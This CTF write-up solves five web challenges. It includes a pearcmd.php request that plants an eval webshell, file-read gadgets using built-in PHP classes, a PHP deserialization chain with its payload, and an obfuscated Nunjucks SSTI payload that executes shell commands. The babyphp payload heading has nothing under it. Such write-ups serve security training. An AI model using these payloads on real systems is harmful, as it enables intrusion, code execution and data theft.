Web
babyphp
Weak-type comparison
```php
<?php
highlight_file(__FILE__);
error_reporting(0);
$num = $_GET['num'];
if (preg_match("/\'|\"|\`| |<|>|?|\^|%|\$/", $num)) {
    die("nononno");
}
if (eval("return ${num} != 2;") && $num == 0 && is_numeric($num) != true) {
    system('cat flag.php');
} else {
    echo '2';
}
```
payload
Then read the flag in the response source (view-source), since flag.php is echoed into the page.
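The gate is three conditions on one string, and two of them behave differently between PHP 7 and PHP 8 (string-to-number comparison, and undefined constants inside the eval). The script below is an added example, not part of the writeup: it replays the same three checks locally so candidates can be tested on the same PHP major version as the target before anything is sent. The blacklist is reproduced as a character class; the candidate values are my own.

```php
<?php
// Added example, not the challenge's code: replay babyphp's gate locally.
// Which candidates pass depends on the PHP version, because PHP 8 changed
// string/number comparison and made undefined constants throw, so always
// check against the same major version as the target.

function passesBabyphp(string $num): array {
    // The challenge's blacklisted characters, as one character class.
    $blocked = preg_match('/[\'"` <>?^%$]/', $num) === 1;

    // eval("return <num> != 2;"): a parse error or (PHP 8) an undefined-constant
    // Error would kill the real script, so treat any throw as a failed condition.
    try {
        $evalTrue = (bool) @eval("return {$num} != 2;");
    } catch (Throwable $e) {
        $evalTrue = false;
    }

    $looseZero  = ($num == 0);             // loose comparison, version dependent
    $notNumeric = is_numeric($num) != true;

    return [
        'blocked'     => $blocked,
        'eval_true'   => $evalTrue,
        'loose_zero'  => $looseZero,
        'not_numeric' => $notNumeric,
        'pass'        => !$blocked && $evalTrue && $looseZero && $notNumeric,
    ];
}

// Constructed candidates: numeric zeros (fail is_numeric), bare words (an
// undefined constant inside the eval) and a hex-looking string.
$candidates = ['0', '0.0', 'a', 'abc', '0x0'];

echo 'PHP ', PHP_VERSION, "\n";
foreach ($candidates as $c) {
    $r = passesBabyphp($c);
    printf("%-5s blocked=%d eval=%d ==0:%d !numeric=%d => %s\n",
        $c, $r['blocked'], $r['eval_true'], $r['loose_zero'], $r['not_numeric'],
        $r['pass'] ? 'PASS' : 'fail');
}
```

On PHP 7.x a bare word such as a satisfies all three conditions: inside the eval an undefined constant only raises a warning and evaluates to the string "a", "a" == 0 is true under PHP 7's string-to-number comparison, and is_numeric("a") is false. On PHP 8 the undefined constant throws inside the eval and "a" == 0 is false, which is why the version of the target decides what works.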
ezphp
Exploiting native (built-in) classes
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
$g = $_GET['g'];
$t = $_GET['t'];
echo new $g($t);
```
First use DirectoryIterator with the glob:// wrapper to locate the flag file:
```
?g=DirectoryIterator&t=glob://*f*
```
Then use SplFileObject with a php:// filter to read the file:
```
?g=SplFileObject&t=php://filter/read=convert.base64-encode/resource=flag.php
```
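The two gadgets above work because both classes take a single string in their constructor and can be echoed. The script below is an added example, not part of the writeup: it enumerates every built-in class that fits that `echo new $g($t)` shape via reflection, then replays the two gadgets against a temporary directory with a constructed flag.php so the output of each can be seen locally. The directory name and file contents are made up for the test.

```php
<?php
// Added example, not the challenge's code. Two things to check before using
// `echo new $g($t)`: which built-in classes fit the gadget shape (at most one
// required constructor argument, usable as a string), and what the two gadgets
// from the writeup actually return on a local copy.

// Built-in, instantiable classes with at most one required constructor
// argument that define __toString (so echo prints something useful).
function gadgetCandidates(): array {
    $found = [];
    foreach (get_declared_classes() as $class) {
        $rc = new ReflectionClass($class);
        if (!$rc->isInternal() || !$rc->isInstantiable()) {
            continue;
        }
        $ctor = $rc->getConstructor();
        if ($ctor === null || $ctor->getNumberOfRequiredParameters() > 1) {
            continue;
        }
        if ($rc->hasMethod('__toString')) {
            $found[] = $class;
        }
    }
    sort($found);
    return $found;
}

// Local replay of the two gadgets against a temporary directory.
function replayGadgets(): array {
    $dir = sys_get_temp_dir() . '/gadget_' . bin2hex(random_bytes(4));
    mkdir($dir);
    // Constructed sample files: only flag.php matches the *f* glob.
    file_put_contents("$dir/flag.php", "<?php \$flag = 'flag{local-test}';\n");
    file_put_contents("$dir/index.php", "<?php echo 'index';\n");

    // DirectoryIterator + glob://: the iterator starts on the first entry
    // matching the pattern, and echo prints that entry's file name.
    $listed = (string) new DirectoryIterator("glob://$dir/*f*");

    // SplFileObject + php://filter: __toString returns the current line, which
    // for a base64-encoded stream is the whole file on one line.
    $encoded = (string) new SplFileObject(
        "php://filter/read=convert.base64-encode/resource=$dir/flag.php");
    $decoded = base64_decode($encoded);

    unlink("$dir/flag.php");
    unlink("$dir/index.php");
    rmdir($dir);
    return ['listed' => $listed, 'decoded' => $decoded];
}

print_r(gadgetCandidates());
print_r(replayGadgets());
```

The candidate list is what makes the technique general: any class it prints (the SplFileInfo family, the Exception hierarchy, and so on) is reachable through the same `new $g($t)` sink, so the search for a usable gadget does not have to stop at the two used here.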
ezinclude
Writing a shell through pearcmd.php
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
if (!preg_match("/data|base64|filter|rot13|input/i", $_GET['sdpc']) && isset($_GET['sdpc'])) {
    include($_GET['sdpc']);
} else {
    die("sry");
}
```
Payload, sent as a raw request with Burp:
```http
GET /?+config-create+/&sdpc=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/v2i.php HTTP/1.1
Host: 43.138.65.13:2021
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
```
Then include the file that config-create wrote, /tmp/v2i.php, and send the command in the POST body:
```
GET:  ?sdpc=/tmp/v2i.php
POST: 1=system('cat flag.php');
```
Then read the flag in the response source.
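The request above only works because of how PHP fills `$_SERVER['argv']` from a GET query when register_argc_argv is on, and because the include filter and pearcmd.php read the same query string differently. The script below is an added example, not part of the writeup: it reproduces PHP's argv split (a raw split on `+`, no URL decoding) on the writeup's own query string and shows what pearcmd.php and the include() each see. The `queryToArgv` helper is mine, written to mirror PHP's behaviour.

```php
<?php
// Added example, not the challenge's code. When register_argc_argv is on
// (PHP's built-in default, which the official Docker images inherit because
// they ship no php.ini), PHP builds $_SERVER['argv'] from the raw query
// string by splitting on '+' and nothing else. pearcmd.php reads that argv,
// which is how a GET request turns into "pear config-create <root> <file>".

// Same rule as PHP's php_build_argv(): raw split on '+', no URL decoding.
function queryToArgv(string $queryString): array {
    return $queryString === '' ? [] : explode('+', $queryString);
}

// The query string from the writeup's request, unchanged.
$query = '+config-create+/&sdpc=/usr/local/lib/php/pearcmd.php&/<?=eval($_POST[1]);?>+/tmp/v2i.php';

// pearcmd treats argv[0] as the program name and takes the command from
// argv[1]; the leading '+' makes argv[0] an empty string so nothing is lost.
// argv[2] is the "root" path (absolute, as PEAR expects; everything after the
// first '&' is simply part of that path as far as PEAR is concerned) and
// argv[3] is the file config-create writes. PEAR copies the root path verbatim
// into that file, so the <?= ... ?> tag lands on disk for the later include().
print_r(queryToArgv($query));

// The same string as the include() sees it: $_GET['sdpc'] stops at the next
// '&', so the blacklist only ever inspects the path to pearcmd.php.
parse_str($query, $get);
var_dump($get['sdpc']);
```

If register_argc_argv is off on the target, argv is empty and pearcmd.php prints its usage instead of running config-create; that is the first thing to check when the include of /tmp/v2i.php comes back with nothing.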
funnyPHP
First use the PHP 7.4 source-disclosure bug (PHP Development Server <= 7.4.21 - Remote Source Disclosure) to obtain the source:
```php
<?php
error_reporting(0);

class A {
    public $sdpc = ["welcome" => "yeah, something hidden."];

    function __call($name, $arguments) {
        $this->$name[$name]();
    }
}

class B {
    public $a;

    function __construct() {
        $this->a = new A();
    }

    function __toString() {
        echo $this->a->sdpc["welcome"];
    }
}

class C {
    public $b;
    protected $c;

    function __construct() {
        $this->c = new B();
    }

    function __destruct() {
        $this->b ? $this->c->sdpc('welcom') : 'welcome!' . $this->c;
    }
}

class Evil {
    function getflag() {
        echo file_get_contents('/fl4g');
    }
}

if (isset($_POST['sdpc'])) {
    unserialize($_POST['sdpc']);
} else {
    serialize(new C());
}
?>
```
The chain: C::__destruct with a truthy $b calls $this->c->sdpc('welcom'). With $c swapped for an A, which has no sdpc() method, A::__call('sdpc') runs `$this->sdpc['sdpc']()` (PHP 7 parses `$this->$name[$name]` as `($this->$name)[$name]`), so whatever string sits in $sdpc['sdpc'] is invoked as a callable. Putting "Evil::getflag" there uses PHP's dynamic call syntax to call a non-static method as if it were static.
Calling a non-static method statically was deprecated in PHP 7, but it only raises a deprecation notice (silenced here by error_reporting(0)) and the method body still runs; PHP 8 turns it into a fatal Error, so this chain is PHP 7 only.
Also, from PHP 7 onward unserialize() is not strict about property visibility, so every property in the payload can be declared public even though C::$c is protected on the server.
exp
```php
<?php
class A {
    public $sdpc = ["sdpc" => "Evil::getflag"]; // what __call('sdpc') ends up invoking
    public $name;
}

class B {
    public $a;
}

class C {
    public $b;
    public $c; // protected on the server; the public form is accepted by unserialize() on PHP 7+

    function __construct() {
        $this->b = '1';     // truthy, so __destruct takes the ->sdpc() branch
        $this->c = new A(); // A has no sdpc() method, so __call fires
    }
}

class Evil {
    function getflag() {
        echo file_get_contents('/fl4g');
    }
}

$a = new C();
echo serialize($a);
```
payload
```
sdpc=O:1:"C":2:{s:1:"b";s:1:"1";s:1:"c";O:1:"A":2:{s:4:"sdpc";a:1:{s:4:"sdpc";s:13:"Evil::getflag";}s:4:"name";N;}}
```
Nunjucks
An SSTI in a Nunjucks template.
Reference: SANDBOX BREAKOUT - A VIEW OF THE NUNJUCKS TEMPLATE ENGINE
The challenge bans the three globals range, cycler and joiner, the usual stepping stones to Function(), so another route to Function() is needed to create a new function.
Here both "".constructor.constructor and {}.constructor.constructor resolve to Function().
Some other keywords are filtered, which string concatenation gets around (+, sent URL-encoded as %2b).
The dot is filtered as well, so properties are read with bracket (dictionary-style) access. Nunjucks is a JavaScript port of jinja, so the remaining bypasses are the same ones used in Python SSTI. The command itself avoids spaces with ${IFS}.
payload
```
username=admin{{({}["const"%2b"ructor"])["cons"%2b"tructor"]("return(global[\"pr\"%2b\"ocess\"][\"ma\"%2b\"inM\"%2b\"odule\"][\"req\"%2b\"uire\"](\"chil\"%2b\"d_pro\"%2b\"cess\")[\"ex\"%2b\"ecSync\"])(\"cat${IFS}/f*\")")()}}&password=123&login=login
```